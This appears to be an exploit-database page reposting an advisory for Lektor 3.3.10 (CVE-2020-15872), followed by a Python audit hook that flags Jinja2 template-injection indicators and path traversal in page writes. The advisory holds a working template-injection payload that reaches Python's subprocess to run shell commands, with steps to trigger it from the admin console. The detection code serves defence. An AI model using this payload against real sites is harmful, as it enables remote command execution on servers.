Lektor 3.3.10 Arbitrary File upload

CVE:               CVE-2020-15872
Category:          CWE-434
Price:             $5,000
Severity:          Critical
Author:            Unknown
Risk:              Critical
Exploitation Type: Remote
Date:              2024-03-20
CPE:               cpe:/a:lektor:lektor:3.3.10
CVSS:              CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS:              0.045
EPSSP:             0.7


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030043

Below is a copy:

Lektor 3.3.10 Arbitrary File upload
# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload
# Date: 20/03/2024
# Exploit Author: kai6u
# Vendor Homepage: https://www.getlektor.com/
# Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10
# Version: 3.3.10
# Tested on: Ubuntu 22.04
1) With access to the administrator console over the network, first create a contents.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory. (The attacker can also upload to any directory.)

Payload:

{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}

2) Create a new page by specifying the created contents.lr as template.

3) Use the preview function to check the sample page with the specified templates.
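The advisory above combines two weaknesses: a page file written outside the directory the editor is supposed to own (the "upload to any directory" remark, CWE-434), and a contents.lr body that the template engine will evaluate as a Jinja2 expression. The following audit hook is an added example written for this page; it is not Lektor's code and not part of the author's advisory. It assumes a project root path, an allowed-extension policy of only `.lr` for page writes, and the indicator list below (attribute chains that walk from a template value into Python internals), all of which are choices made for the example. The sample bodies are constructed.

```python
"""Audit Lektor-style page writes for the two weaknesses the advisory describes:
a file that lands outside the project root, and a contents.lr body carrying a
Jinja2 template-injection expression. Example code, not Lektor's own."""
import os
import re
import tempfile

# Indicator regexes (assumed list for this example). Each name is reported when
# the pattern matches anywhere in the uploaded body.
SSTI_INDICATORS = {
    "jinja_expr_class": re.compile(r"\{\{[^}]*__class__"),
    "mro_walk": re.compile(r"__mro__"),
    "subclasses_walk": re.compile(r"__subclasses__"),
    "globals_access": re.compile(r"__globals__|__builtins__"),
}

# Extensions the hook accepts for a page write (assumed policy).
ALLOWED_EXTENSIONS = {".lr"}


def find_ssti_indicators(text: str) -> list:
    """Return the indicator names that match in text, in table order."""
    return [name for name, rx in SSTI_INDICATORS.items() if rx.search(text)]


def is_within_root(root: str, rel_path: str) -> bool:
    """True if root/rel_path normalises to a location inside root.

    '..' segments can climb out of the project directory, and os.path.join
    discards root entirely when rel_path is absolute; both cases are caught
    by comparing the normalised target against root."""
    root_n = os.path.normpath(os.path.abspath(root))
    target = os.path.normpath(os.path.join(root_n, rel_path))
    try:
        return os.path.commonpath([root_n, target]) == root_n
    except ValueError:  # different drives on Windows: cannot be inside root
        return False


def audit_upload(root: str, rel_path: str, body: str) -> dict:
    """Decide whether a proposed page write should be allowed."""
    ext_ok = os.path.splitext(rel_path)[1].lower() in ALLOWED_EXTENSIONS
    path_ok = is_within_root(root, rel_path)
    indicators = find_ssti_indicators(body)
    verdict = "allow" if (ext_ok and path_ok and not indicators) else "block"
    return {"ext_ok": ext_ok, "path_ok": path_ok,
            "indicators": indicators, "verdict": verdict}


def scan_content_dir(root: str) -> dict:
    """Walk an existing project and report every .lr file with indicators."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith(".lr"):
                full = os.path.join(dirpath, fn)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits = find_ssti_indicators(fh.read())
                if hits:
                    findings[os.path.relpath(full, root)] = hits
    return findings


# Constructed sample bodies (not taken from any real project).
BENIGN_BODY = "title: About\n---\nbody: Hello from Lektor.\n"
MALICIOUS_BODY = "title: Evil\n---\nbody: {{ ''.__class__.__mro__[1] }}\n"


if __name__ == "__main__":
    print(audit_upload("/srv/lektor", "content/about/contents.lr", BENIGN_BODY))
    print(audit_upload("/srv/lektor", "templates/../../tmp/contents.lr", MALICIOUS_BODY))
    # Retroactive sweep of a project that already has files on disk.
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "content", "evil"))
        with open(os.path.join(tmp, "content", "evil", "contents.lr"), "w") as fh:
            fh.write(MALICIOUS_BODY)
        print(scan_content_dir(tmp))
```

Run it as a script to see the three verdicts; in a real deployment `audit_upload` would sit in front of whatever writes the page file, and `scan_content_dir` is the one-off sweep for content that was written before the hook existed. The indicator list is a detection aid, not a parser: the durable fix is to treat editor-supplied content as data rather than as a template.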

Copyright ©2024 Exploitalert.
